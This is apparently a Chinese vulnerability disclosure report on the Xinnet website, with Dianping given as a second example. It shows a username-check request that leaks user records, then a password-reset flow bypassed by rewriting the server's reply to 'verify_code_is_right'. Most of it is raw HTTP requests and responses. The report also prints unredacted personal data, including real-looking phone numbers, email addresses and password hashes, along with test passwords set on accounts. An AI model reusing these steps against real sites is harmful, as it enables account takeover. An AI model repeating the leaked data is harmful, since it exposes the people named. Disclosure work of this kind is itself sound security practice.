新网某处设计缺陷可任意用户密码重置及手机号密码密文泄漏（大众点评网为例）

简要描述：

新网某处设计缺陷可任意用户密码重置及手机号密码密文泄漏（大众点评网为例）

详细说明：

重置密码要先从敏感信息泄漏开始

code 区域

POST /user/userlogin.do?method=checkUserName HTTP/1.1Host: www.xinnet.comProxy-Connection: keep-aliveContent-Length: 18Accept: application/json, text/javascript, */*; q=0.01Origin: http://www.xinnet.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8DNT: 1Referer: http://www.xinnet.com/views/loginnew/forgetpwd.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3userName=hy4911980

利用敏感信息泄漏，我们可以获取

code 区域

{"id":4535227,"agentCode":"hy4911980","email":"151******71","password":"$1$39$QCqKIUdkYwfj20lFApPbE0","mobileNum":"15165955871","state":"02"}

code 区域

{"id":4535226,"agentCode":"hy4911979","userEmail":"13832465238@163.com","userNameEmail":"13832465238@163.com","email":"138******38","password":"$1$99$E/YOf1qM9JWviO5wdnXes0","mobileNum":"13832465238","state":"02"}

password不知道什么加密方式，暂且先不理会，我们需要用到的是会员的手机号

去找回密码处利用会员名（hy4911979）手机号（13832465238） 进行找回密码

抓包

code 区域

POST /user/userlogin.do?method=checkMobileVerifyCode HTTP/1.1Host: www.xinnet.comProxy-Connection: keep-aliveContent-Length: 33Accept: text/plain, */*; q=0.01Origin: http://www.xinnet.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8DNT: 1Referer: http://www.xinnet.com/views/loginnew/forgetpwd.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3MobileNum=13832465238&Code=123456

修改该请求的返回包为：verify_code_is_right

13832465238 wooyuntest123

漏洞证明：

大众点评网为例：

15800310255 wooyuntest123